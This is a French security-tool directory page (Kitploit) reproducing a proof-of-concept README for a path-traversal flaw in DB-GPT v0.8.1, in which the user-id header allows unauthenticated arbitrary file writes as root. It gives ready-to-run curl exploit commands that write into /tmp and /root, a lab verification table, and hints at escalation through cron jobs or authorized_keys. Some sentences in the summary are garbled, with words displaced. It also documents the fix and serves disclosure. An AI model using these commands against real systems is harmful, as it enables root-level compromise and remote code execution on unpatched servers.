Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-73034-PoC — CVE-2026-73034 — DB-GPT v0.8.1 : traversée de chemin non authentifiée → écriture arbitraire de fichier en tant que root via l'en-tête user-id. Vérifié + diff du correctif. | Kitploit
Outils/GitHubGitHub/boreas37/cve-2026-73034-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubboreas37/cve-2026-73034-poc

CVE-2026-73034-PoC

CVE-2026-73034 — DB-GPT v0.8.1 : traversée de chemin non authentifiée → écriture arbitraire de fichier en tant que root via l'en-tête user-id. Vérifié + diff du correctif.

Voir le dépôt
143il y a 29 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-73034 — DB-GPT v0.8.1 Traversée de chemin non authentifiée → Écriture arbitraire de fichiers

CVSS 9.8 (Critique) · CWE-22 · GHSA/Issue #3104

Résumé

POST /api/v1/python/file/upload dans DB-GPT v0.8.1 prend l'en-tête HTTP user-id et l'utilise brut comme composant de chemin :

root@kitploit:~
upload_dir = os.path.join(base_dir, "python_uploads", user_id)
os.makedirs(upload_dir, exist_ok=True)
open(file_path, "wb")

Il n'y a aucune authentification — si l'en-tête est absent, l'application revient à user_id="001" avec role="admin". L'injection de séquences ../ dans permet de sortir de la racine des téléversements et laisse un où le processus du conteneur (root) peut écrire → chemin direct vers une RCE (racine web , tâches cron, , …).

user-id
attaquant distant non authentifié écrire des fichiers arbitraires partout
.py
authorized_keys

Versions affectées : DB-GPT ≤ v0.8.1 Corrigé : v0.8.2+ — commit e0c741bd2b5e521b128cffb3f68982dde3f7b359 (ajoute une liste blanche _SAFE_USER_ID_RE ^[A-Za-z0-9_\-]+$, des vérifications de confinement du répertoire de téléversement, et une revérification des liens symboliques TOCTOU).

Exploitation

root@kitploit:~
# write pwned.txt into /tmp/pwned/ on the server (as root)
curl -X POST "http://TARGET/api/v1/python/file/upload" \
  -H "user-id: ../../../../tmp/pwned" \
  -F "[email protected];filename=pwned.txt"

# write into /root/ (arbitrary location)
curl -X POST "http://TARGET/api/v1/python/file/upload" \
  -H "user-id: ../../../../root" \
  -F "[email protected];filename=pwned_root.txt"

Remarque : FastAPI mappe le paramètre user_id sur l'en-tête HTTP user-id (trait d'union, pas de soulignement).

Vérification (2026-08-12, laboratoire Docker, ARM64)

TestRésultat
Téléversement témoin (user-id: alice)✅ /app/python_uploads/alice/control.txt
Exploitation user-id: ../../../../tmp/pwned✅ /tmp/pwned/pwned.txt ÉCRIT (root)
Exploitation user-id: ../../../../root✅ /root/pwned_root.txt ÉCRIT
Build corrigé (e0c741bd)✅ HTTP 400 Invalid user_id: only alphanumeric characters, underscores and hyphens are allowed

Script complet : poc_cve-2026-73034.sh (exécute les deux exploitations + vérification dans le conteneur + comparaison avec le build corrigé).

Références

  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-73034
  • Correctif : https://github.com/eosphoros-ai/DB-GPT/commit/e0c741bd2b5e521b128cffb3f68982dde3f7b359
  • Problème : https://github.com/eosphoros-ai/DB-GPT/issues/3104
  • Projet : https://github.com/eosphoros-ai/DB-GPT
Télécharger l’outil